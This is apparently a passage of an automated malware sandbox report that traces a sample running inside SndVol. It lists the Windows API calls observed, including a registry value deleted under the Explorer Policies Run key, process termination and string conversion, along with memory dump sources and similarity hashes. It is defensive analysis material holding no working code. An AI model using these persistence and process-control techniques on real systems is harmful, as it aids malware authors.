• RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0292BFB2,00000000,029942E0,029942F8,?,pth_unenc), ref: 02932988
• RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 02932998
Strings
• Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 02932986
Memory Dump Source
• Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
• Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
Similarity
• API ID: DeleteOpenValue
• String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
• API String ID: 2654517830-1051519024
• Opcode ID: 88f1fd3d76bfbc7818eb81a5cd1b2372ef8ea5855f3b379418dbf8bfc5192340
• Instruction ID: 3ed624c3c08e6affc0e06283230c1dcbb29d833841fd4326e075514fb5cf1519
• Opcode Fuzzy Hash: 88f1fd3d76bfbc7818eb81a5cd1b2372ef8ea5855f3b379418dbf8bfc5192340
• Instruction Fuzzy Hash: A8E01274A40304BBEF114FA1DD06FEA77ACBB80B88F004554F905E5080E371DD14A651
APIs
• TerminateProcess.KERNEL32(00000000,pth_unenc,0292E670), ref: 029316A9
• WaitForSingleObject.KERNEL32(000000FF), ref: 029316BC
Memory Dump Source
• Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
• Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
Similarity
• API ID: ObjectProcessSingleTerminateWait
• String ID: pth_unenc
• API String ID: 1872346434-4028850238
• Opcode ID: 5b358549f8ec6f89177a427f7f0508c8f94208d7c6805b784e9a334be89d12c2
• Instruction ID: c87b4fae8eeefffd4702922640d1df6480187ad43e7417008ade8cad4124d7ee
• Opcode Fuzzy Hash: 5b358549f8ec6f89177a427f7f0508c8f94208d7c6805b784e9a334be89d12c2
• Instruction Fuzzy Hash: 2CD0C938DCD1129FDB414AACAC08BA57A6DBB15631F108A06F834412E0CB654478AA14
APIs
• MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,02921AD8), ref: 0295FAF4
• GetLastError.KERNEL32 ref: 0295FB02
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0295FB5D
Memory Dump Source
• Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
• Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
Similarity
• API ID: ByteCharMultiWide$ErrorLast
• String ID:
• API String ID: 1717984340-0
• Opcode ID: 98ff0874764a81f39abb8920310761d6a0cce30dece1f1e7fa6a0de1111c4c5a
• Instruction ID: a50be29f26f9e0038eddb00720ffbf9a2209799a81fb79648d4b05dee6ad0ed2
• Opcode Fuzzy Hash: 98ff0874764a81f39abb8920310761d6a0cce30dece1f1e7fa6a0de1111c4c5a
• Instruction Fuzzy Hash: 2241F231700666EBCB21CF64C854BBABBA9EF42334F1545ADEC5D9B5A0EB318801CB51